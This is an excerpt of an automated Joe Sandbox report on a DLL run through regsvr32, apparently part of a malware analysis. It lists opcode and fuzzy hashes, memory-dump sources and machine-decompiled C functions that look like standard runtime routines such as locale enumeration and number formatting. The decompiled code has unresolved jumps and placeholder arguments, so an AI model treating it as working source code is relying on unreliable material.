                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: cb2713a35df24ca135e1fd70038ab8aa197c2248b7dedadc43f549993bc517a1
                                                                      • Instruction ID: 4e07d4b360de5ebfbe4526821c9ad0fa890c7fcbf7c9d3805ae8227ea03da93c
                                                                      • Opcode Fuzzy Hash: cb2713a35df24ca135e1fd70038ab8aa197c2248b7dedadc43f549993bc517a1
                                                                      • Instruction Fuzzy Hash: 5AF01972200B4882E785DB25F8513DA23A1E79CBC0F14D125FA4983765DF3CC699D340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00000001180051230(void* __edx, void* __rax, long long __rbx, signed char* __rcx, signed long long __rdx, long long _a8) {
                                                                      				int _t14;
                                                                      				void* _t21;
                                                                      				signed char* _t24;
                                                                      				signed long long _t28;
                                                                      				signed long long _t30;
                                                                      				void* _t31;
                                                                      
                                                                      				_t28 = __rdx;
                                                                      				_t21 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_t24 = __rcx;
                                                                      				E00000001180038680(__rax, __rcx, __rdx, _t31);
                                                                      				_t30 = (_t28 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t21 + 0xa0)) + _t30 * 2)) != 0) goto 0x80051252;
                                                                      				 *(_t21 + 0xb4) = 0 | _t30 == 0x00000003;
                                                                      				_t14 = EnumSystemLocalesW(??, ??);
                                                                      				if (( *_t24 & 0x00000004) != 0) goto 0x80051284;
                                                                      				 *_t24 = 0;
                                                                      				return _t14;
                                                                      			}









                                                                      0x180051230
                                                                      0x180051230
                                                                      0x180051230
                                                                      0x18005123a
                                                                      0x18005123d
                                                                      0x180051252
                                                                      0x180051259
                                                                      0x180051270
                                                                      0x180051277
                                                                      0x180051280
                                                                      0x180051282
                                                                      0x18005128e

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                      • String ID:
                                                                      • API String ID: 3029459697-0
                                                                      • Opcode ID: 0c34b75fbdd54c8ef3f7425f7d246a648dc6494047a316870a47c4ab906cf6e6
                                                                      • Instruction ID: 826071b9f96e29b1d2fa409f13ae2cab7374998c9f2d6e38bcd5f7142a214af6
                                                                      • Opcode Fuzzy Hash: 0c34b75fbdd54c8ef3f7425f7d246a648dc6494047a316870a47c4ab906cf6e6
                                                                      • Instruction Fuzzy Hash: F5F0547260078845DB925F65E4403DD7BE1E794BE4F15C211F674872D5CA7485948701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: 97f4ff447fd17ebd38f83a96beb342d43df64d32d721934c9b011ad91969f218
                                                                      • Instruction ID: 120c699b544514e759ce37845bec6a102b6c4b587f2a437520fe0a002c4c71fd
                                                                      • Opcode Fuzzy Hash: 97f4ff447fd17ebd38f83a96beb342d43df64d32d721934c9b011ad91969f218
                                                                      • Instruction Fuzzy Hash: B5E0E5B5200A0881FB85DB25EC5239933A1A75DBD0F80E125E90E8B764DE3DC2999311
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: 02cdf491a7a233dc9b9b39e83503ec295919ead63f2a6447a5a50ce2594661da
                                                                      • Instruction ID: 2a1e3628567d421f02049d5d7828a01a073b3cbc9223c12235e40ff47cfd8bc1
                                                                      • Opcode Fuzzy Hash: 02cdf491a7a233dc9b9b39e83503ec295919ead63f2a6447a5a50ce2594661da
                                                                      • Instruction Fuzzy Hash: A6E04670600B0481F7869B61FC523E923A1A7ADBD0F90D225F80A877609E3DC39D9300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E0000000118003DAC0(void* __rax, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long __r11, long long _a8, long long _a16, long long _a24, char* _a40, signed int _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72, long long _a80) {
                                                                      				void* _v40;
                                                                      				long long _v48;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v72;
                                                                      				unsigned int* _v80;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				intOrPtr _t83;
                                                                      				void* _t84;
                                                                      				void* _t86;
                                                                      				signed int _t88;
                                                                      				unsigned int* _t121;
                                                                      				signed int _t122;
                                                                      				void* _t140;
                                                                      				char* _t159;
                                                                      				unsigned long long _t171;
                                                                      				char* _t185;
                                                                      				char* _t186;
                                                                      				intOrPtr _t187;
                                                                      				unsigned int* _t190;
                                                                      				char* _t193;
                                                                      				intOrPtr* _t198;
                                                                      				intOrPtr* _t199;
                                                                      				void* _t200;
                                                                      				void* _t203;
                                                                      				void* _t204;
                                                                      				signed long long _t207;
                                                                      				signed long long _t212;
                                                                      				signed long long _t215;
                                                                      				void* _t218;
                                                                      				char* _t220;
                                                                      				void* _t221;
                                                                      				signed int* _t223;
                                                                      				char* _t232;
                                                                      				char* _t233;
                                                                      				char* _t234;
                                                                      				char* _t240;
                                                                      				long long _t244;
                                                                      				void* _t246;
                                                                      				intOrPtr* _t247;
                                                                      				unsigned int* _t248;
                                                                      
                                                                      				_t244 = __r11;
                                                                      				_t230 = __r8;
                                                                      				_t225 = __rbp;
                                                                      				_t219 = __rsi;
                                                                      				_t207 = __rdx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				r11d = 0;
                                                                      				 *__rdx = r11b;
                                                                      				_t121 =  >=  ? _a48 : r11d;
                                                                      				_t185 = __rdx;
                                                                      				_t248 = __rcx;
                                                                      				_t5 = _t218 + 0xb; // 0xb
                                                                      				if (__r8 - _t5 > 0) goto 0x8003db38;
                                                                      				_t190 = _a80;
                                                                      				_t7 = _t244 + 0x22; // 0x22
                                                                      				_v80 = _t190;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v88 = __r11;
                                                                      				_t190[0xc] = 1;
                                                                      				_t190[0xb] = _t7;
                                                                      				E0000000118003AA20(__rax, __rdx, _t190, __rdx, __rsi, __rbp, __r8);
                                                                      				goto 0x8003de56;
                                                                      				if (( *_t190 >> 0x00000034 & _t207) != _t207) goto 0x8003dbd7;
                                                                      				_v48 = _a80;
                                                                      				_v56 = _a72;
                                                                      				_v64 = _a64;
                                                                      				_t159 = _a40;
                                                                      				_v72 = r11b;
                                                                      				_v80 = _t121;
                                                                      				_v88 = _t159;
                                                                      				if (E0000000118003D834(_t185, _t248, _t185, _t218, _t219, _t230, __r9) == 0) goto 0x8003dba6;
                                                                      				 *_t185 = 0;
                                                                      				goto 0x8003de56;
                                                                      				_t193 = _t185;
                                                                      				E000000011800494EC(_t76, 0x65, _t159, _t193);
                                                                      				if (_t159 == 0) goto 0x8003de54;
                                                                      				 *_t159 = ((_a56 ^ 0x00000001) << 5) + 0x50;
                                                                      				 *((char*)(_t159 + 3)) = 0;
                                                                      				goto 0x8003de54;
                                                                      				if (_t193 >= 0) goto 0x8003dbe9;
                                                                      				 *_t185 = 0x2d;
                                                                      				_t186 = _t185 + 1;
                                                                      				_t247 = _t186 + 1;
                                                                      				r12d = 0x3ff;
                                                                      				r15d = (_a56 ^ 0x00000001) & 0x000000ff;
                                                                      				r8d = 0x30;
                                                                      				_a48 = r15d;
                                                                      				if ((0x00000000 &  *_t248) != 0) goto 0x8003dc48;
                                                                      				 *_t186 = r8b;
                                                                      				asm("dec ebp");
                                                                      				r12d = r12d & 0x000003fe;
                                                                      				goto 0x8003dc4b;
                                                                      				 *_t186 = 0x31;
                                                                      				_t220 = _t247 + 1;
                                                                      				if (_t121 != 0) goto 0x8003dc58;
                                                                      				goto 0x8003dc8f;
                                                                      				_t187 = _a80;
                                                                      				if ( *((intOrPtr*)(_t187 + 0x28)) != r11b) goto 0x8003dc7f;
                                                                      				E00000001180006E80( ~( *_t248 & 0xffffffff), _t187, _t187, _t185, _t220);
                                                                      				r11d = 0;
                                                                      				_t32 = _t244 + 0x30; // 0x30
                                                                      				r8d = _t32;
                                                                      				_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x18)) + 0xf8))))));
                                                                      				 *_t247 = _t83;
                                                                      				if (( *_t248 & 0xffffffff) <= 0) goto 0x8003dd33;
                                                                      				if (_t121 <= 0) goto 0x8003dcdd;
                                                                      				_t84 = _t83 + r8w;
                                                                      				_t140 = _t84 - 0x39;
                                                                      				if (_t140 <= 0) goto 0x8003dcca;
                                                                      				 *_t220 = _t84 + (r15d << 5) + 7;
                                                                      				_t122 = _t121 - 1;
                                                                      				_t221 = _t220 + 1;
                                                                      				if (_t140 >= 0) goto 0x8003dcaa;
                                                                      				goto 0x8003dd2b;
                                                                      				r9d = _a72;
                                                                      				r8d = r8w & 0xffff;
                                                                      				_t86 = E0000000118003D9A8(_t84 + (r15d << 5) + 7, _t7, _t187, _t248, 0 >> 4, _t218, _t221, _t225);
                                                                      				r11d = 0;
                                                                      				if (_t86 == 0) goto 0x8003dd2b;
                                                                      				_t38 = _t221 - 1; // -1
                                                                      				_t198 = _t38;
                                                                      				if (0x47 != 0) goto 0x8003dd10;
                                                                      				 *_t198 = 0x30;
                                                                      				_t199 = _t198 - 1;
                                                                      				goto 0x8003dcff;
                                                                      				if (_t199 == _t247) goto 0x8003dd28;
                                                                      				if ( *_t198 != 0x39) goto 0x8003dd20;
                                                                      				bpl = bpl + 0x3a;
                                                                      				goto 0x8003dd23;
                                                                      				 *_t199 = bpl;
                                                                      				goto 0x8003dd2b;
                                                                      				 *((char*)(_t199 - 1)) =  *((char*)(_t199 - 1)) + 1;
                                                                      				r15d = _a48;
                                                                      				if (_t122 <= 0) goto 0x8003dd54;
                                                                      				r8d = _t122;
                                                                      				_t200 = _t221;
                                                                      				_t88 = E000000011800051C0(0xbadb67, dil, _t200, 0 >> 4, _t230);
                                                                      				r11d = 0;
                                                                      				goto 0x8003dd59;
                                                                      				_t223 =  ==  ? _t247 : _t221 + _t187;
                                                                      				r15b = r15b << 5;
                                                                      				r15b = r15b + 0x50;
                                                                      				 *_t223 = r15b;
                                                                      				_t46 =  &(_t223[0]); // 0x2
                                                                      				_t240 = _t46;
                                                                      				_t171 =  *_t248 >> 0x34;
                                                                      				if ( *_t247 - r11b >= 0) goto 0x8003dd8c;
                                                                      				_t203 = _t246 - _t171;
                                                                      				_t47 = _t171 + 2; // 0x2d
                                                                      				_t91 =  <  ? _t47 : 0x2b;
                                                                      				_t223[0] =  <  ? _t47 : 0x2b;
                                                                      				 *_t240 = dil;
                                                                      				if (_t203 - 0x3e8 < 0) goto 0x8003dde0;
                                                                      				_t49 = _t240 + 1; // 0x3
                                                                      				_t232 = _t49;
                                                                      				_t212 = (_t200 - _t246 >> 7) + (_t200 - _t246 >> 7 >> 0x3f);
                                                                      				 *_t240 = _t218 + _t212;
                                                                      				_t204 = _t203 + _t212 * 0xfffffc18;
                                                                      				if (_t232 != _t240) goto 0x8003dde6;
                                                                      				if (_t204 - 0x64 < 0) goto 0x8003de19;
                                                                      				_t215 = (_t212 + _t204 >> 6) + (_t212 + _t204 >> 6 >> 0x3f);
                                                                      				 *_t232 = _t218 + _t215;
                                                                      				_t233 = _t232 + 1;
                                                                      				if (_t233 != _t240) goto 0x8003de1f;
                                                                      				if (_t204 + _t215 * 0xffffff9c - 0xa < 0) goto 0x8003de4a;
                                                                      				 *_t233 = _t218 + (_t215 >> 2) + (_t215 >> 2 >> 0x3f);
                                                                      				_t234 = _t233 + 1;
                                                                      				 *_t234 = (_t88 & 0x000007ff) + dil;
                                                                      				 *((intOrPtr*)(_t234 + 1)) = r11b;
                                                                      				return 0;
                                                                      			}













































                                                                      0x18003dac0
                                                                      0x18003dac0
                                                                      0x18003dac0
                                                                      0x18003dac0
                                                                      0x18003dac0
                                                                      0x18003dac0
                                                                      0x18003dac5
                                                                      0x18003daca
                                                                      0x18003dae3
                                                                      0x18003dae8
                                                                      0x18003daf1
                                                                      0x18003daf4
                                                                      0x18003daf7
                                                                      0x18003dafa
                                                                      0x18003db03
                                                                      0x18003db05
                                                                      0x18003db0d
                                                                      0x18003db11
                                                                      0x18003db16
                                                                      0x18003db19
                                                                      0x18003db1c
                                                                      0x18003db23
                                                                      0x18003db27
                                                                      0x18003db2c
                                                                      0x18003db33
                                                                      0x18003db4d
                                                                      0x18003db5e
                                                                      0x18003db70
                                                                      0x18003db7b
                                                                      0x18003db7f
                                                                      0x18003db87
                                                                      0x18003db8c
                                                                      0x18003db90
                                                                      0x18003db9c
                                                                      0x18003db9e
                                                                      0x18003dba1
                                                                      0x18003dbab
                                                                      0x18003dbae
                                                                      0x18003dbb6
                                                                      0x18003dbcc
                                                                      0x18003dbce
                                                                      0x18003dbd2
                                                                      0x18003dbdf
                                                                      0x18003dbe1
                                                                      0x18003dbe3
                                                                      0x18003dbf0
                                                                      0x18003dbf6
                                                                      0x18003dbfc
                                                                      0x18003dc00
                                                                      0x18003dc09
                                                                      0x18003dc2e
                                                                      0x18003dc30
                                                                      0x18003dc3c
                                                                      0x18003dc3f
                                                                      0x18003dc46
                                                                      0x18003dc48
                                                                      0x18003dc4b
                                                                      0x18003dc51
                                                                      0x18003dc56
                                                                      0x18003dc58
                                                                      0x18003dc64
                                                                      0x18003dc69
                                                                      0x18003dc6e
                                                                      0x18003dc7b
                                                                      0x18003dc7b
                                                                      0x18003dc8d
                                                                      0x18003dc8f
                                                                      0x18003dc96
                                                                      0x18003dcaf
                                                                      0x18003dcbd
                                                                      0x18003dcc1
                                                                      0x18003dcc5
                                                                      0x18003dcca
                                                                      0x18003dccc
                                                                      0x18003dcce
                                                                      0x18003dcd9
                                                                      0x18003dcdb
                                                                      0x18003dcdd
                                                                      0x18003dce5
                                                                      0x18003dcef
                                                                      0x18003dcf4
                                                                      0x18003dcf9
                                                                      0x18003dcfb
                                                                      0x18003dcfb
                                                                      0x18003dd06
                                                                      0x18003dd08
                                                                      0x18003dd0b
                                                                      0x18003dd0e
                                                                      0x18003dd13
                                                                      0x18003dd18
                                                                      0x18003dd1a
                                                                      0x18003dd1e
                                                                      0x18003dd23
                                                                      0x18003dd26
                                                                      0x18003dd28
                                                                      0x18003dd2b
                                                                      0x18003dd35
                                                                      0x18003dd37
                                                                      0x18003dd3a
                                                                      0x18003dd47
                                                                      0x18003dd4f
                                                                      0x18003dd52
                                                                      0x18003dd5d
                                                                      0x18003dd61
                                                                      0x18003dd65
                                                                      0x18003dd69
                                                                      0x18003dd6c
                                                                      0x18003dd6c
                                                                      0x18003dd73
                                                                      0x18003dd84
                                                                      0x18003dd89
                                                                      0x18003dd97
                                                                      0x18003dd9a
                                                                      0x18003dd9d
                                                                      0x18003dda0
                                                                      0x18003ddaa
                                                                      0x18003ddb6
                                                                      0x18003ddb6
                                                                      0x18003ddc8
                                                                      0x18003ddce
                                                                      0x18003ddd8
                                                                      0x18003ddde
                                                                      0x18003dde4
                                                                      0x18003de01
                                                                      0x18003de07
                                                                      0x18003de0a
                                                                      0x18003de17
                                                                      0x18003de1d
                                                                      0x18003de3d
                                                                      0x18003de40
                                                                      0x18003de4d
                                                                      0x18003de50
                                                                      0x18003de73

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfffffff
                                                                      • API String ID: 0-1523873471
                                                                      • Opcode ID: a5400300484f68c2c1b4c74915e230e927e094f1ff373d6d8332906987651bf4
                                                                      • Instruction ID: 6c1b59bb3455270adf6689e0f9f35e1ff9527a0fa79deb26cb728e3f839431c7
                                                                      • Opcode Fuzzy Hash: a5400300484f68c2c1b4c74915e230e927e094f1ff373d6d8332906987651bf4
                                                                      • Instruction Fuzzy Hash: 77A133727147CC86EBA7CB26B4407DABB91A769BC4F06C122EE8947785DA3DC609C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0000000118000B5D8(signed int __esi, long long __rbx, void* __rcx, long long __rbp, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rsi;
                                                                      				long long _t20;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t20 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != 0) goto 0x8000b63b;
                                                                      				 *((char*)(_t20 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t20 + 0x2c)) = 0x16;
                                                                      				_v32 = _t20;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v40 = __rbp;
                                                                      				E0000000118003AA20(_t20, __rcx,  *((intOrPtr*)(__rcx + 0x460)), _t26, _t27, __rbp, _t33);
                                                                      				return __esi | 0xffffffff;
                                                                      			}










                                                                      0x18000b5d8
                                                                      0x18000b5dd
                                                                      0x18000b5ea
                                                                      0x18000b600
                                                                      0x18000b602
                                                                      0x18000b606
                                                                      0x18000b60d
                                                                      0x18000b612
                                                                      0x18000b615
                                                                      0x18000b618
                                                                      0x18000b621
                                                                      0x18000b63a

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 464a9e29076ab3737584b2a270d1f31aae67e0871ccdcaf63917efaebd3d70f5
                                                                      • Instruction ID: 1e7e5fa8f254cf61ba1b62c434a810c6694c23ce9c0cf6346c2ca1c84e367d86
                                                                      • Opcode Fuzzy Hash: 464a9e29076ab3737584b2a270d1f31aae67e0871ccdcaf63917efaebd3d70f5
                                                                      • Instruction Fuzzy Hash: 4DB1B37211464886E7E6CF39C0943ED3BA5E34DB88F18C119EB4A87399CF36CA48CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E000000011800086C4(signed int __esi, long long __rbx, void* __rcx, long long __rbp, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rsi;
                                                                      				long long _t20;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t20 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != 0) goto 0x80008727;
                                                                      				 *((char*)(_t20 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t20 + 0x2c)) = 0x16;
                                                                      				_v32 = _t20;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v40 = __rbp;
                                                                      				E0000000118003AA20(_t20, __rcx,  *((intOrPtr*)(__rcx + 0x460)), _t26, _t27, __rbp, _t33);
                                                                      				return __esi | 0xffffffff;
                                                                      			}










                                                                      0x1800086c4
                                                                      0x1800086c9
                                                                      0x1800086d6
                                                                      0x1800086ec
                                                                      0x1800086ee
                                                                      0x1800086f2
                                                                      0x1800086f9
                                                                      0x1800086fe
                                                                      0x180008701
                                                                      0x180008704
                                                                      0x18000870d
                                                                      0x180008726

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 9a2b37d9ede16d008b99948c143c3fbf6a4a3c9102663a8f9e8c51a0e7b13957
                                                                      • Instruction ID: 00c143932cc0b7bdde967fe46b4b0b7e26099bdb53d28eaaf345010dad723976
                                                                      • Opcode Fuzzy Hash: 9a2b37d9ede16d008b99948c143c3fbf6a4a3c9102663a8f9e8c51a0e7b13957
                                                                      • Instruction Fuzzy Hash: 35B18F7220475885E7AACF39C0543AD3BE0F749B88F18911AEBCA07399DF35C648E756
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 55%
                                                                      			E000000011800126AC(signed int __esi, long long __rbx, signed long long __rcx, signed int __rbp, void* __r8, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				signed int _t113;
                                                                      				void* _t118;
                                                                      				signed int _t133;
                                                                      				signed int _t135;
                                                                      				void* _t139;
                                                                      				signed int _t141;
                                                                      				signed int _t150;
                                                                      				void* _t163;
                                                                      				intOrPtr _t171;
                                                                      				intOrPtr* _t173;
                                                                      				intOrPtr* _t184;
                                                                      				intOrPtr* _t189;
                                                                      				signed long long _t192;
                                                                      				signed long long _t194;
                                                                      				intOrPtr _t200;
                                                                      				intOrPtr _t202;
                                                                      				void* _t204;
                                                                      				void* _t209;
                                                                      				void* _t211;
                                                                      				signed int _t212;
                                                                      				void* _t217;
                                                                      
                                                                      				_t217 = __r8;
                                                                      				_t212 = __rbp;
                                                                      				_t194 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t171 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t141 = __esi | 0xffffffff;
                                                                      				_t192 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x800126e3;
                                                                      				 *((char*)(_t171 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t171 + 0x2c)) = 0x16;
                                                                      				goto 0x80012a11;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x80012719;
                                                                      				 *((char*)(_t171 + 0x30)) = 1;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t171 + 0x2c)) = 0x16;
                                                                      				r8d = 0;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = __rbp;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t204, _t211, __rbp, __r8);
                                                                      				goto 0x800129bf;
                                                                      				 *((intOrPtr*)(_t194 + 0x468)) =  *((intOrPtr*)(_t194 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t194 + 0x468)) == 2) goto 0x800129bc;
                                                                      				_t173 =  *((intOrPtr*)(_t192 + 0x10));
                                                                      				 *((intOrPtr*)(_t192 + 0x48)) = 0;
                                                                      				 *(_t192 + 0x24) = bpl;
                                                                      				r8b =  *_t173;
                                                                      				 *((long long*)(_t192 + 0x10)) = _t173 + 1;
                                                                      				 *((intOrPtr*)(_t192 + 0x39)) = r8b;
                                                                      				if (r8b == 0) goto 0x800129a9;
                                                                      				r9b = r8b;
                                                                      				if ( *(_t192 + 0x20) < 0) goto 0x800129a9;
                                                                      				if (_t217 - 0x20 - 0x5a > 0) goto 0x8001277b;
                                                                      				goto 0x8001277e;
                                                                      				_t113 =  *(0x8005efd0 + (r8b - 0x20 + _t194 * 8) * 2) & 0x000000ff;
                                                                      				 *(_t192 + 0x24) = _t113;
                                                                      				if (_t113 - 8 >= 0) goto 0x800129fe;
                                                                      				_t150 = _t113;
                                                                      				if (_t150 == 0) goto 0x800128b8;
                                                                      				if (_t150 == 0) goto 0x800128a1;
                                                                      				if (_t150 == 0) goto 0x80012852;
                                                                      				if (_t150 == 0) goto 0x8001281b;
                                                                      				if (_t150 == 0) goto 0x80012813;
                                                                      				if (_t150 == 0) goto 0x800127e9;
                                                                      				if (_t150 == 0) goto 0x800127df;
                                                                      				if (_t113 - 0xfffffffffffffffc != 1) goto 0x80012a2a;
                                                                      				E00000001180013044(_t139, _t192, _t192, _t209, _t211);
